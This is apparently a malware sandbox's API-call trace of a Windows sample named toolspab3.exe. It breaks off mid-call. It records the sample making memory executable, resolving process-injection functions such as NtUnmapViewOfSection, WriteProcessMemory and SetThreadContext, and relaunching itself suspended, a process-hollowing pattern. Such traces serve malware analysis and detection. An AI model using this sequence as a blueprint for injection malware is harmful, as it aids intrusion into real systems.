lpMultiByteStr=0x19fb2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0074.063] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x683160) returned 1 [0074.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x683160 | out: hHeap=0x680000) returned 1 [0074.063] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28) returned 1 [0074.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28 | out: hHeap=0x680000) returned 1 [0074.063] GetLastError () returned 0x0 [0074.063] SetLastError (dwErrCode=0x0) [0074.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0074.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x22c) returned 0x682f28 [0074.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x682f50, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0074.063] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0074.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x22c) returned 0x683160 [0074.063] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x683188, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0074.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0074.063] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x683160) returned 1 [0074.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x683160 | out: hHeap=0x680000) returned 1 [0074.063] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28) returned 1 [0074.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28 | out: hHeap=0x680000) returned 1 [0074.063] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0074.063] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0074.063] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x420760) returned 0x0 [0074.064] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x682c28) returned 1 [0081.705] LocalAlloc (uFlags=0x0, uBytes=0xf428) returned 0x6d1e00 [0081.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74530000 [0081.711] GetProcAddress (hModule=0x74530000, lpProcName="VirtualProtect") returned 0x74547a50 [0081.711] VirtualProtect (in: lpAddress=0x6d1e00, dwSize=0xf428, flNewProtect=0x40, lpflOldProtect=0x19cd7c | out: lpflOldProtect=0x19cd7c*=0x4) returned 1 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.723] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.724] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.725] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.726] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.727] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.728] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.729] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.730] GetLastError () returned 0x0 [0081.776] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74530000 [0081.776] GetProcAddress (hModule=0x74530000, lpProcName="GlobalAlloc") returned 0x74549950 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="GetLastError") returned 0x74543870 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="Sleep") returned 0x74547990 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="CreateToolhelp32Snapshot") returned 0x74557b50 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="Module32First") returned 0x745744b0 [0081.777] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0081.778] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xa0 [0081.846] Module32First (hSnapshot=0xa0, lpme=0x199818) returned 1 [0081.846] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0081.849] LoadLibraryA (lpLibFileName="user32") returned 0x76300000 [0083.626] GetProcAddress (hModule=0x76300000, lpProcName="MessageBoxA") returned 0x7637fec0 [0083.626] GetProcAddress (hModule=0x76300000, lpProcName="GetMessageExtraInfo") returned 0x76333690 [0083.626] LoadLibraryA (lpLibFileName="kernel32") returned 0x74530000 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="WinExec") returned 0x7456ff70 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="CreateFileA") returned 0x74556880 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="WriteFile") returned 0x74556ca0 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="CloseHandle") returned 0x74556630 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="CreateProcessA") returned 0x74570750 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="GetThreadContext") returned 0x7454ec60 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAlloc") returned 0x74547810 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="VirtualAllocEx") returned 0x74572730 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="VirtualFree") returned 0x74547600 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="ReadProcessMemory") returned 0x74571c80 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="WriteProcessMemory") returned 0x74572850 [0083.626] GetProcAddress (hModule=0x74530000, lpProcName="SetThreadContext") returned 0x74572490 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="ResumeThread") returned 0x7454a800 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="WaitForSingleObject") returned 0x74556820 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="GetModuleFileNameA") returned 0x7454a720 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="GetCommandLineA") returned 0x7454ab60 [0083.627] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77260000 [0083.627] GetProcAddress (hModule=0x77260000, lpProcName="NtUnmapViewOfSection") returned 0x772d6f40 [0083.627] GetProcAddress (hModule=0x77260000, lpProcName="NtWriteVirtualMemory") returned 0x772d7040 [0083.627] GetProcAddress (hModule=0x76300000, lpProcName="RegisterClassExA") returned 0x76334e90 [0083.627] GetProcAddress (hModule=0x76300000, lpProcName="CreateWindowExA") returned 0x76336f30 [0083.627] GetProcAddress (hModule=0x76300000, lpProcName="PostMessageA") returned 0x7632f0e0 [0083.627] GetProcAddress (hModule=0x76300000, lpProcName="GetMessageA") returned 0x7632e130 [0083.627] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcA") returned 0x772eaed0 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="GetFileAttributesA") returned 0x74556a20 [0083.627] GetProcAddress (hModule=0x74530000, lpProcName="GetStartupInfoA") returned 0x74549c10 [0083.628] GetProcAddress (hModule=0x74530000, lpProcName="VirtualProtectEx") returned 0x74572790 [0083.628] GetProcAddress (hModule=0x74530000, lpProcName="ExitProcess") returned 0x74557b30 [0083.628] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0083.628] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0083.628] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0083.628] RegisterClassExA (param_1=0x1994d4) returned 0xc1da [0083.629] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x30268 [0089.927] PostMessageA (hWnd=0x30268, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0089.927] GetMessageA (in: lpMsg=0x199504, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x199504) returned 1 [0089.928] GetMessageA (in: lpMsg=0x199504, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x199504) returned 1 [0089.929] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x5e0000 [0089.929] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5e0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe")) returned 0x2b [0089.929] GetStartupInfoA (in: lpStartupInfo=0x199428 | out: lpStartupInfo=0x199428*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0089.929] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" " [0089.929] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x199428*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x199480 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" ", lpProcessInformation=0x199480*(hProcess=0x118, hThread=0x114, dwProcessId=0x1314, dwThreadId=0x1310)) returned 1 [0089.951] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.951] VirtualAlloc (lpAddress=0x0, 